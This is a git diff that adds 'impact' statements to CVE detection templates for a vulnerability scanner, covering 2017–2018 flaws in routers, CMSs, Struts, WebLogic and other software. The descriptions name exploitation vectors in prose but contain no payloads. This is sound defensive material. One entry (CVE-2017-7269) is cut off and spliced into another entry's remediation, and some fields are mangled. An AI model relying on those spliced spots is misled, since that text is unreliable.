@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 7506ebf435..e91577b69f 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in , which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. + impact: | + An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access. remediation: | Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches. reference: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 582d380067..92bc06911b 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml 
@@ -5,6 +5,8 @@ info: author: emadshanab,milo2012 severity: critical description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by Palo Alto Networks. reference: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 55d7eb2883..873ec3e31f 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs. + impact: | + An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server. remediation: | Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 3271ccd802..2e9f00ad30 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Upgrade Nextjs to version 2.4.1 or above to mitigate this vulnerability. reference: 
diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index dc76963dd1..bf68dd2302 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the application. remediation: | Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 7083be0b7e..d8da9b6747 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + impact: | + Successful exploitation of this vulnerability could lead to the theft of sensitive information, session hijacking, or the execution of arbitrary code in the context of the affected user. remediation: | Update to the latest version of the WordPress Emag Marketplace Connector plugin (1.1) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index a8919bc489..a1b4c061ac 100644 --- a/http/cves/2017/CVE-2017-17059.yaml 
+++ b/http/cves/2017/CVE-2017-17059.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser. remediation: | Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 7752e2f05d..8a7d5f9571 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 0f15b649b6..c26c8850c3 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -6,6 +6,8 @@ info: severity: high description: | description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: | Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index d44999c3d3..4e90a1c740 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 1df0e340a4..819e347bb7 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard. + impact: | + An attacker can gain administrative privileges on the Kentico CMS system. remediation: | Upgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 4d9c0bea4e..cbd21bb55b 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 7834cba252..f2246f9169 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting. + impact: | + This vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website. remediation: | Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 659b3de1c1..64bfb69d11 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml 
@@ -5,6 +5,8 @@ info: author: pussycat0x severity: medium description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 21366ae735..345f609e7b 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + impact: | + An attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches. reference: diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 3cb9a64175..d46a674688 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 481c4bd21a..2db57efc4b 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information. remediation: | Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 855f454857..6f28dfa7f2 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml 
@@ -5,6 +5,8 @@ info: author: Manas_Harsh,daffainfo,geeknik,dr0pd34d severity: medium description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request. + impact: | + An attacker can easily determine valid usernames, which can lead to targeted attacks such as brute force attacks or social engineering. remediation: | Update WordPress to version 4.7.1 or later reference: diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 8116c4b40c..e7f88b9c32 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -6,6 +6,8 @@ info: severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 980f4583c9..de4d200f33 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml 
@@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index fe34d7b79d..ef934cb107 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string. + impact: | + Remote attackers can execute arbitrary commands on the target system. remediation: | Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches. reference: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 42d76fe036..ff11f582fd 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Intel Active Management firmware, potentially leading to unauthorized control of the affected system. remediation: | Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index ad9d44c25e..5c34f10fb4 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system. remediation: | Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index a9eebf6dc0..6e2f4b56cf 100644 
--- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If =6.2.17) or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 04f08ba604..68355f03af 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index fbd4a11343..6e69774097 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK,pikpikcu severity: critical description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Jenkins server. remediation: | Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index f9e1a8ec28..548929857f 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -6,6 +6,8 @@ info: severity: high description: | AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network. remediation: | Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation. reference: diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 8a11077dbd..4776bae753 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 653f661ca5..970aa24241 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 9059365187..6cc97c2393 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_akoko severity: high description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system. remediation: | Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 861e184639..f28120779f 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 3fc4a67e12..375b6ba4f4 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: 
diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index 76ac3674bd..b0df02d112 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by LG to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index fb52a5ef1c..2a6b194b51 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the target system remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability reference: diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index af1b49c7d2..c5ccaec096 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 063588bf3e..9d8762cf68 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 0d602eaf9b..b5ce1ed655 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 71ebf9e7b3..94c94f741e 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -6,6 +6,8 @@ info: severity: high description: | OpenCart Divido plugin is susceptible to SQL injection + impact: | + This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system. remediation: | Apply the official patch or upgrade to a version that includes the fix. reference: diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index b5118a2e4c..dda8197d9e 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability. reference: 
diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 9510ab55b3..4cfaa06f64 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index f6e9e76821..08eba880e1 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 7eea3583a6..9994d88a01 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical. + impact: | + Unauthenticated attackers can gain unauthorized access to the Apache Tomcat Manager interface, potentially leading to further compromise of the server. remediation: | Upgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches. reference: diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 902cee9120..817e6d48f3 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace. + impact: | + Remote code execution remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 66e4fd3979..4de2355e68 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml 
